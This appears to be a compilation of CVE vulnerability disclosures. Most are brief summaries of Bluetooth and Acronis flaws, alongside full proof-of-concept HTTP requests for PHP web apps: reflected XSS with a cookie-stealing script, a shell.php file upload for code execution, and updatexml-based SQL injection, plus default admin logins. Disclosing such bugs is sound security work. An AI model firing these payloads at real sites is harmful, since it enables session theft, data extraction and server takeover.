An information leakage vulnerability in the Bluetooth Low Energy advertisement scan response in Bluetooth Core Specifications 4.0 through 5.2, and extended scan response in Bluetooth Core Specifications 5.0 through 5.2, may be used to identify devices using Resolvable Private Addressing (RPA) by their response or non-response to specific scan requests from remote addresses. RPAs that have been associated with a specific remote device may also be used to identify a peer in the same manner by using its reaction to an active scan request. This has also been called an allowlist-based side channel.

CVE-2020-35473: ACM CCS 2022

Food Ordering Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /foms/place-order.php.

Permalink

**Food Ordering Management System v1.0 by oretnom23 has Cross-site scripting (reflected)**

BUG\_Author: Oudaorui

Login account: admin/admin123 (Super Admin account)

vendors:https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html

Vulnerability File: /foms/place-order.php

#POC：

    POST /foms/place-order.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=q8rk2e0ji131erjfddf8dtu1hf
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/foms/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 85
    
    1=0rev13%22%3e%3cscript%3ealert('xss')%3c%2fscript%3et4kbj&2=0&description=777596&action=
    

#POC：

    POST /foms/place-order.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=q8rk2e0ji131erjfddf8dtu1hf
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/foms/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 99
    
    1=0rev13%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3et4kbj&2=0&description=777596&action=

CVE-2022-43046: bug_report/XSS-1.md at main · Oudaorui/bug_report

Online Tours & Travels Management System v1.0 was discovered to contain an arbitrary file upload vulnerability in the component update_profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Dig-Bick

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/admin.php?id=2

Loophole location: Online Tours & Travels management system's update\_profile.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /tour/admin/operations/admin.php?id\=2 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/update\_profile.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------27994107238879
Content-Length: 856
\-----------------------------27994107238879
Content-Disposition: form-data; name="fname"
Mayuri
\-----------------------------27994107238879
Content-Disposition: form-data; name="lname"
K
\-----------------------------27994107238879
Content-Disposition: form-data; name="email"
mayuri.infospace@gmail.com
\-----------------------------27994107238879
Content-Disposition: form-data; name="contact"
+919405716239
\-----------------------------27994107238879
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------27994107238879
Content-Disposition: form-data; name="old\_img"
133.jpeg
\-----------------------------27994107238879
Content-Disposition: form-data; name="update"
\-----------------------------27994107238879--

The files will be uploaded to this directory \\tour\\admin\\upload

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43050: bug_report/RCE-1.md at main · 1909900436/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/classes/Users.php?f=delete_test.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Dig-Bick

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete\_test

Vulnerability location: /odlms/classes/Users.php?f=delete\_test,id

dbname=odlms\_db,length=8

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete\_test HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43051: bug_report/SQLi-1.md at main · 1909900436/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/classes/Users.php?f=delete.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Dig-Bick

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete

Vulnerability location: /odlms/classes/Users.php?f=delete,id

dbname=odlms\_db,length=8

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=6'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43052: bug_report/SQLi-2.md at main · 1909900436/bug_report

Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40107.

CVE-2022-44744

Sensitive information leak through log files. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40107.

CVE-2022-44745

Sensitive information disclosure due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40107.

CVE-2022-44746

Local privilege escalation due to improper soft link handling. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40107.

CVE-2022-44747

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 39900.

Tag

#windows